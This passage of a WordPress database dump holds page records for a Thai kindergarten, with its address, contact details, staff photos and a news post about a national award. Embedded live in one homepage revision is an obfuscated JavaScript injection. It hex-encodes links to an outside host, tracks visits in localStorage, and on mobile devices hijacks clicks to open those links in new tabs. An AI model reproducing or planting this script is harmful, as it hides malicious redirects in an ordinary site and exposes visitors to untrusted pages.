{\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:33:00','2025-10-26 09:33:00','',19,'http://watprato.ssk.in.th/?p=747',0,'revision','',0),
(751,1,'2025-11-13 11:48:37','2025-11-13 04:48:37','<!-- wp:paragraph -->\n<p>ชนะเลิศ ระดับประเทศ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>การประเมินการดำเนินงานโครงการชีววิถีเพื่อการพัฒนาอย่างยืน ประจำปี 2568&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทที่ 5 โรงเรียนที่ได้รับความรู้จากสถานศึกษา และใช้ได้ผลดีเด่น<br>ร่วมกับวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เมื่อวันที่ 27 ตุลาคม 2568 ที่ผ่านมา โรงเรียนอนุบาลวัดพระโตได้รับการประเมินการดำเนินงานโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ระดับประเทศ ประจำปี 2568 โดยได้รับเกียรติจากหม่อมหลวงชไมทิพ เทวกุล หัวหน้ากองกิจการเพื่อสังคม การไฟฟ้าฝ่ายผลิตแห่งประเทศไทย (กฟผ.) ได้ให้เกียรติร่วมการประเมินในครั้งนี้ ซึ่งมีนายปรัชญา ตะภา ผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีมหาสารคาม เป็นประธานคณะกรรมการในการประเมิน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>นางสาวธรรศญา หล่าอุดม รองผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้ให้เกียรติกล่าวต้อนรับคณะกรรมการ และแขกผู้มีเกียรติ พร้อมด้วยผู้อำนวยการโรงเรียนอนุบาลวัดพระโต รองผู้อำนวยการ คณะครูและบุคลากรทางการศึกษา ศึกษานิเทศก์ คณะกรรมการสถานศึกษา ผู้บริหารในกลุ่ม CEO เมืองหลวงพ่อโต กลุ่มเครือข่ายที่เกี่ยวข้อง โรงเรียนเครือข่าย ผู้ปกครอง และนักเรียน ได้ร่วมต้อนรับกันอย่างพร้อมเพรียง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":752,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1024x538.jpg\" alt=\"\" class=\"wp-image-752\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโตได้รับรางวัลเหรียญทอง ','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82-14','','','2025-11-13 11:50:00','2025-11-13 04:50:00','',0,'http://watprato.ssk.in.th/?p=751',0,'post','',0),
(752,1,'2025-11-13 11:48:13','2025-11-13 04:48:13','','572095115_122254848554202781_886880693938319365_n','','inherit','open','closed','','572095115_122254848554202781_886880693938319365_n','','','2025-11-13 11:48:13','2025-11-13 04:48:13','',751,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n.jpg',0,'attachment','image/jpeg',0),
(753,1,'2025-11-13 11:48:37','2025-11-13 04:48:37','<!-- wp:paragraph -->\n<p>ชนะเลิศ ระดับประเทศ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>การประเมินการดำเนินงานโครงการชีววิถีเพื่อการพัฒนาอย่างยืน ประจำปี 2568&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ประเภทที่ 5 โรงเรียนที่ได้รับความรู้จากสถานศึกษา และใช้ได้ผลดีเด่น<br>ร่วมกับวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เมื่อวันที่ 27 ตุลาคม 2568 ที่ผ่านมา โรงเรียนอนุบาลวัดพระโตได้รับการประเมินการดำเนินงานโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ระดับประเทศ ประจำปี 2568 โดยได้รับเกียรติจากหม่อมหลวงชไมทิพ เทวกุล หัวหน้ากองกิจการเพื่อสังคม การไฟฟ้าฝ่ายผลิตแห่งประเทศไทย (กฟผ.) ได้ให้เกียรติร่วมการประเมินในครั้งนี้ ซึ่งมีนายปรัชญา ตะภา ผู้อำนวยการวิทยาลัยเกษตรและเทคโนโลยีมหาสารคาม เป็นประธานคณะกรรมการในการประเมิน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>นางสาวธรรศญา หล่าอุดม รองผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้ให้เกียรติกล่าวต้อนรับคณะกรรมการ และแขกผู้มีเกียรติ พร้อมด้วยผู้อำนวยการโรงเรียนอนุบาลวัดพระโต รองผู้อำนวยการ คณะครูและบุคลากรทางการศึกษา ศึกษานิเทศก์ คณะกรรมการสถานศึกษา ผู้บริหารในกลุ่ม CEO เมืองหลวงพ่อโต กลุ่มเครือข่ายที่เกี่ยวข้อง โรงเรียนเครือข่าย ผู้ปกครอง และนักเรียน ได้ร่วมต้อนรับกันอย่างพร้อมเพรียง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":752,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/11/572095115_122254848554202781_886880693938319365_n-1024x538.jpg\" alt=\"\" class=\"wp-image-752\"/></figure>\n<!-- /wp:image -->','โรงเรียนอนุบาลวัดพระโตได้รับรางวัลเหรียญทอง ','','inherit','closed','closed','','751-revision-v1','','','2025-11-13 11:48:37','2025-11-13 04:48:37','',751,'http://watprato.ssk.in.th/?p=753',0,'revision','',0),
(754,1,'2025-11-13 11:51:52','2025-11-13 04:51:52','','560432794_122252459414202781_8219191812793928684_n','','inherit','open','closed','','560432794_122252459414202781_8219191812793928684_n','','','2025-11-13 11:51:52','2025-11-13 04:51:52','',19,'http://watprato.ssk.in.th/wp-content/uploads/2025/11/560432794_122252459414202781_8219191812793928684_n.jpg',0,'attachment','image/jpeg',0),
(755,1,'2025-11-13 11:52:11','2025-11-13 04:52:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:gallery {\"columns\":3,\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-3 is-cropped\"><!-- wp:image {\"id\":736,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/10/ผอ.วิชุดา-724x1024.jpg\" alt=\"\" class=\"wp-image-736\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"align\":\"center\",\"style\":{\"typography\":{\"fontSize\":\"25px\"}}} -->\n<p class=\"has-text-align-center\" style=\"font-size:25px\">            <strong>     นางวิชุดา ชัยชาญ </strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"center\"} -->\n<p class=\"has-text-align-center\"><strong>ผู้อำนวยการโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist 